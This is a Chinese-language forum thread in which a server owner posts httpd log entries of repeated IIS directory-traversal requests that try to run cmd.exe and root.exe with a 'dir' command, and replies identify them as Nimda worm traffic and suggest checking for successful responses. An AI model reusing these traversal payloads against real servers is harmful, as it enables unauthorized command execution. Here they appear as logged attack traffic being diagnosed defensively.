k*n
2 楼
有个IP不停的向我的server发这样的信号:
(从httpd log里看见的)
"GET /scripts/root.exe?/c+dir HTTP/1.0"
"GET /MSADC/root.exe?/c+dir HTTP/1.0"
"GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0"
"GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0"
"GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
"GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
"GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
"GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
等等等等.
(从httpd log里看见的)
"GET /scripts/root.exe?/c+dir HTTP/1.0"
"GET /MSADC/root.exe?/c+dir HTTP/1.0"
"GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0"
"GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0"
"GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
"GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
"GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
"GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
等等等等.
m*n
3 楼
别去
w*n
4 楼
Yes, it might be a tool or worm though...
【在 k**n 的大作中提到】
: 有个IP不停的向我的server发这样的信号:
: (从httpd log里看见的)
: "GET /scripts/root.exe?/c+dir HTTP/1.0"
: "GET /MSADC/root.exe?/c+dir HTTP/1.0"
: "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0"
: "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0"
: "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
: "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
: "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
: "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
M*t
6 楼
that server was infected by Nimda...
【在 k**n 的大作中提到】
: 有个IP不停的向我的server发这样的信号:
: (从httpd log里看见的)
: "GET /scripts/root.exe?/c+dir HTTP/1.0"
: "GET /MSADC/root.exe?/c+dir HTTP/1.0"
: "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0"
: "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0"
: "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
: "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
: "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
: "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
【在 k**n 的大作中提到】
: 有个IP不停的向我的server发这样的信号:
: (从httpd log里看见的)
: "GET /scripts/root.exe?/c+dir HTTP/1.0"
: "GET /MSADC/root.exe?/c+dir HTTP/1.0"
: "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0"
: "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0"
: "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
: "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
: "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
: "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
M*t
7 楼
看看有没有200啊?
看看你的C盘被共享了吗?
【在 k**n 的大作中提到】
: 有个IP不停的向我的server发这样的信号:
: (从httpd log里看见的)
: "GET /scripts/root.exe?/c+dir HTTP/1.0"
: "GET /MSADC/root.exe?/c+dir HTTP/1.0"
: "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0"
: "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0"
: "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
: "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
: "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
: "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
看看你的C盘被共享了吗?
【在 k**n 的大作中提到】
: 有个IP不停的向我的server发这样的信号:
: (从httpd log里看见的)
: "GET /scripts/root.exe?/c+dir HTTP/1.0"
: "GET /MSADC/root.exe?/c+dir HTTP/1.0"
: "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0"
: "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0"
: "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
: "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
: "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
: "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
相关阅读
Please Help! Help! Help!EPOAgent ?[转载] 那里买norton antivirus enterprise 最便宜?谁知道怎么破译邮箱密码?Network Security TheoryBloodhound.w32.EP问题求教Symantec Antivirus自动update的问题[转载] another problem of ie security怎样杀和lsass.exe有关的病毒?Help: winzip passwordDual Screenhow to show IE Status Bar所有滚屏操作变得非常慢,求救!!Password does not decrypt secret key山东大学王小云教授成功破解MD5这儿有没有人做security research的[转载] 文件被lock了,该怎么办?请电脑大牛们帮忙[转载] survey network security